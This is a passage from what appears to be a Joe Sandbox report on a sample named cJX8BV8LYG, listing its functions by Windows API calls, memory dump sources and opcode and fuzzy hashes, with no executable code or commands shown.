                                    • SysFreeString.OLEAUT32(?), ref: 007E77B9
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007E77DE
                                    • SysAllocString.OLEAUT32(?), ref: 007E77EC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: ba0fdb40dd705e83eb77c9b03f7c3b7858fde8ea632d9f03111d505ae7c71a8d
                                    • Instruction ID: 64f9eaadcc63fdbd4201bc90d7415699ca6dc89116ed0db5c9679b77d115da00
                                    • Opcode Fuzzy Hash: ba0fdb40dd705e83eb77c9b03f7c3b7858fde8ea632d9f03111d505ae7c71a8d
                                    • Instruction Fuzzy Hash: 32219C76609219AFDB14DFA9DC88CBB73ACEF093647048025FA14DB150D6749C42C764
                                    Function 007E77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E7842
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007E7868
                                    • SysAllocString.OLEAUT32(00000000), ref: 007E786B
                                    • SysAllocString.OLEAUT32 ref: 007E788C
                                    • SysFreeString.OLEAUT32 ref: 007E7895
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 007E78AF
                                    • SysAllocString.OLEAUT32(?), ref: 007E78BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: e54780f406212fdc2b937bdd18e822ac041c68f2780a1538b7180799a516da30
                                    • Instruction ID: 02582f0f4bb722d8d1b84bd6d2f40a7ed9a0641777563f2c6b92b305a2c8ff10
                                    • Opcode Fuzzy Hash: e54780f406212fdc2b937bdd18e822ac041c68f2780a1538b7180799a516da30
                                    • Instruction Fuzzy Hash: 1021BD31609214AFEB14AFA9DC8CDAA77ACFF1C3607108025F914CB2A0DA78DC41CB64
                                    Function 007F04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 007F04F2
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F052E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 9794cb5ecb67f92ead9d0f998c327c6df8672fff195e7855f1b9c823b82f81c5
                                    • Instruction ID: e9afd7b483537bcd462f654a7e8d4d11be01d07e19762ac65a885e6fabc47419
                                    • Opcode Fuzzy Hash: 9794cb5ecb67f92ead9d0f998c327c6df8672fff195e7855f1b9c823b82f81c5
                                    • Instruction Fuzzy Hash: F1218271500309ABDF208F29DC08EAA77A8BF45724F204A19F9A1D73E1D7B4D960CFA0
                                    Function 007F05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 007F05C6
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007F0601
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateHandlePipe
                                    • String ID: nul
                                    • API String ID: 1424370930-2873401336
                                    • Opcode ID: 7e9fc292ca011dcd8e78e40aea033f363900438094a9677c33b715d013d40458
                                    • Instruction ID: 2244aad334c30d78dc12b157e4fb536aa3f7035593693d409e73015f9217d7b9
                                    • Opcode Fuzzy Hash: 7e9fc292ca011dcd8e78e40aea033f363900438094a9677c33b715d013d40458
                                    • Instruction Fuzzy Hash: D921A375500319DBDB208F689C08AAA77E8BF85720F204A19FAA1E73D1D7B49860CB90
                                    Function 008140AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0078600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0078604C
                                      • Part of subcall function 0078600E: GetStockObject.GDI32(00000011), ref: 00786060
                                      • Part of subcall function 0078600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078606A
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00814112
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0081411F
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0081412A
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00814139
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00814145
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: b14d3f01945f3c4136f425a738f7c61cf892f23a0c6ebfa072eb0206798c499b
                                    • Instruction ID: 267e1b59f3495d09a0aa27f5c9a3c6819e101cc5b576e7e5b499d5e9c0427db6
                                    • Opcode Fuzzy Hash: b14d3f01945f3c4136f425a738f7c61cf892f23a0c6ebfa072eb0206798c499b
                                    • Instruction Fuzzy Hash: 481190B214021DBEEF119E64CC86EE77F5DFF09798F004110BA18E6150C6769C619BA4
                                    Function 007BD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007BD7A3: _free.LIBCMT ref: 007BD7CC
                                    • _free.LIBCMT ref: 007BD82D
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • _free.LIBCMT ref: 007BD838
                                    • _free.LIBCMT ref: 007BD843
                                    • _free.LIBCMT ref: 007BD897
                                    • _free.LIBCMT ref: 007BD8A2
                                    • _free.LIBCMT ref: 007BD8AD
                                    • _free.LIBCMT ref: 007BD8B8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                    • Instruction ID: 841e325f6b5f1eadc95d699a3bfb69d74f33f5ca3c2afb7d175ac7d68de36eb8
                                    • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                    • Instruction Fuzzy Hash: 5A11C971541B04FAD631BFB0CC4AFCB7B9CAF05700F404C25F29DA65A2EA69B9068A60
                                    Function 007EDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007EDA74
                                    • LoadStringW.USER32(00000000), ref: 007EDA7B
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007EDA91
                                    • LoadStringW.USER32(00000000), ref: 007EDA98
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007EDADC
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 007EDAB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 4072794657-3128320259
                                    • Opcode ID: 183f704fe9aa9eab6bd81c38ef9180708f790ca409dc23d7ff45d9945836fa06
                                    • Instruction ID: 27ba59bad2b226bf54f94e6129073f4bb8723724d59a83a8b5776d5b2633d648
                                    • Opcode Fuzzy Hash: 183f704fe9aa9eab6bd81c38ef9180708f790ca409dc23d7ff45d9945836fa06
                                    • Instruction Fuzzy Hash: 780186F65402087FE7109BE49D89EE7376CFB08301F4084A5B706E2041E6749E844F74
                                    Function 007F096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InterlockedExchange.KERNEL32(010A0788,010A0788), ref: 007F097B
                                    • EnterCriticalSection.KERNEL32(010A0768,00000000), ref: 007F098D
                                    • TerminateThread.KERNEL32(00000000,000001F6), ref: 007F099B
                                    • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007F09A9
                                    • CloseHandle.KERNEL32(00000000), ref: 007F09B8
                                    • InterlockedExchange.KERNEL32(010A0788,000001F6), ref: 007F09C8
                                    • LeaveCriticalSection.KERNEL32(010A0768), ref: 007F09CF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                    • String ID:
                                    • API String ID: 3495660284-0
                                    • Opcode ID: d56f7feab59e7455618c527127b6a966bae2d0eb0101051084d666cc26c6635d
                                    • Instruction ID: 887438025557425247d5aa49be9ed7be2613f805d265e52533d2c8726e009fd9
                                    • Opcode Fuzzy Hash: d56f7feab59e7455618c527127b6a966bae2d0eb0101051084d666cc26c6635d
                                    • Instruction Fuzzy Hash: 04F0E131482612BBD7515F94EE8DBE6BB39FF05702F405015F201909A1D779A565CF90
                                    Function 00785D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 00785D30
                                    • GetWindowRect.USER32(?,?), ref: 00785D71
                                    • ScreenToClient.USER32(?,?), ref: 00785D99
                                    • GetClientRect.USER32(?,?), ref: 00785ED7
                                    • GetWindowRect.USER32(?,?), ref: 00785EF8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Window$Screen
                                    • String ID:
                                    • API String ID: 1296646539-0
                                    • Opcode ID: 7783daff97155337041d64dd8fbcb5964ec2f9d65827153365ee0813fa44fc99
                                    • Instruction ID: 50489b4705d29233b2cf3c2048d6c5d9c557261f97cbabeb66e2a2c4d26a8024
                                    • Opcode Fuzzy Hash: 7783daff97155337041d64dd8fbcb5964ec2f9d65827153365ee0813fa44fc99
                                    • Instruction Fuzzy Hash: 77B16B34A0064ADBDB10DFA9C880BEEB7F1FF58310F14851EE8A9D7250DB38AA51DB54
                                    Function 007B01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                    Download Yara Rule
                                    APIs
                                    • __allrem.LIBCMT ref: 007B00BA
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B00D6
                                    • __allrem.LIBCMT ref: 007B00ED
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B010B
                                    • __allrem.LIBCMT ref: 007B0122
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B0140
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction ID: 32db0c706c80411eeb6a5854a076098ce3dbe91e71ce2936951de39ca9a15dd1
                                    • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                    • Instruction Fuzzy Hash: 2E81F776A0170ADFE724AE68CC45BAF73E9AF82364F24423EF551D7681E778D9008790
                                    Function 00801D10 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00803149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0080101C,00000000,?,?,00000000), ref: 00803195
                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00801DC0
                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00801DE1
                                    • WSAGetLastError.WSOCK32 ref: 00801DF2
                                    • inet_ntoa.WSOCK32(?), ref: 00801E8C
                                    • htons.WSOCK32(?,?,?,?,?), ref: 00801EDB
                                    • _strlen.LIBCMT ref: 00801F35
                                      • Part of subcall function 007E39E8: _strlen.LIBCMT ref: 007E39F2
                                      • Part of subcall function 00786D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0079CF58,?,?,?), ref: 00786DBA
                                      • Part of subcall function 00786D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0079CF58,?,?,?), ref: 00786DED
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                    • String ID:
                                    • API String ID: 1923757996-0
                                    • Opcode ID: 89d9e770c7b09d40f3d0e322fde2504c59fa502e117ec40522062625706ec662
                                    • Instruction ID: 175c17b2308d2b72da97d3baa746808a0fb9433b2ef71349529f1c809a84571f
                                    • Opcode Fuzzy Hash: 89d9e770c7b09d40f3d0e322fde2504c59fa502e117ec40522062625706ec662
                                    • Instruction Fuzzy Hash: 55A1C131204341AFDB64EB24C889E2A77A5FF85328F54894CF4569B2E2CB35ED41CB91
                                    Function 007B61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,007A82D9,007A82D9,?,?,?,007B644F,00000001,00000001,8BE85006), ref: 007B6258
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,007B644F,00000001,00000001,8BE85006,?,?,?), ref: 007B62DE
                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 007B63D8
                                    • __freea.LIBCMT ref: 007B63E5
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    • __freea.LIBCMT ref: 007B63EE
                                    • __freea.LIBCMT ref: 007B6413
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                    • String ID:
                                    • API String ID: 1414292761-0
                                    • Opcode ID: d1deb8ad1ae42c791c4b084fa042a83c76ca175afb50d104b5dd4714ee1e4b8e
                                    • Instruction ID: f9fcff2417ee9573391ef6bd10c409b34b2cc67c64f1c63d7c5462712da7b1e0
                                    • Opcode Fuzzy Hash: d1deb8ad1ae42c791c4b084fa042a83c76ca175afb50d104b5dd4714ee1e4b8e
                                    • Instruction Fuzzy Hash: 28519D72A00216ABEB258F64DC85FEF7BAAEF44750B154629FA05D7140EB3CDC84C6A0
                                    Function 0080BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                      • Part of subcall function 0080C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0080B6AE,?,?), ref: 0080C9B5
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080C9F1
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA68
                                      • Part of subcall function 0080C998: _wcslen.LIBCMT ref: 0080CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0080BCCA
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0080BD25
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0080BD6A
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0080BD99
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0080BDF3
                                    • RegCloseKey.ADVAPI32(?), ref: 0080BDFF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 1120388591-0
                                    • Opcode ID: afdb905524af287cf2705e48ef2002650cc784b78cb2c9347caf063a5806a1bf
                                    • Instruction ID: 925dade60dded7fadbea1e40a458e35d166287c0fdcae37f10333a79c89223d1
                                    • Opcode Fuzzy Hash: afdb905524af287cf2705e48ef2002650cc784b78cb2c9347caf063a5806a1bf
                                    • Instruction Fuzzy Hash: CD81B030208241EFD754EF24C895E6ABBE5FF84308F14895DF5598B2A2DB31ED45CB92
                                    Function 007DF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(00000035), ref: 007DF7B9
                                    • SysAllocString.OLEAUT32(00000001), ref: 007DF860
                                    • VariantCopy.OLEAUT32(007DFA64,00000000), ref: 007DF889
                                    • VariantClear.OLEAUT32(007DFA64), ref: 007DF8AD
                                    • VariantCopy.OLEAUT32(007DFA64,00000000), ref: 007DF8B1
                                    • VariantClear.OLEAUT32(?), ref: 007DF8BB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCopy$AllocInitString
                                    • String ID:
                                    • API String ID: 3859894641-0
                                    • Opcode ID: a32cf876c73a2d4e62d14c7cc5e220ae213c9103d95223acd977cc3220d63000
                                    • Instruction ID: 850f3c87886950dbb7be681bb3f7c9f655d8e6540e4612cec42e5d9cbfdbf21f
                                    • Opcode Fuzzy Hash: a32cf876c73a2d4e62d14c7cc5e220ae213c9103d95223acd977cc3220d63000
                                    • Instruction Fuzzy Hash: 3251B531A41310FACF10AB65D8A9B29B3B8EF45310F248467E907DF391DB789C40C796
                                    Function 007F910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00787620: _wcslen.LIBCMT ref: 00787625
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • GetOpenFileNameW.COMDLG32(00000058), ref: 007F94E5
                                    • _wcslen.LIBCMT ref: 007F9506
                                    • _wcslen.LIBCMT ref: 007F952D
                                    • GetSaveFileNameW.COMDLG32(00000058), ref: 007F9585
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
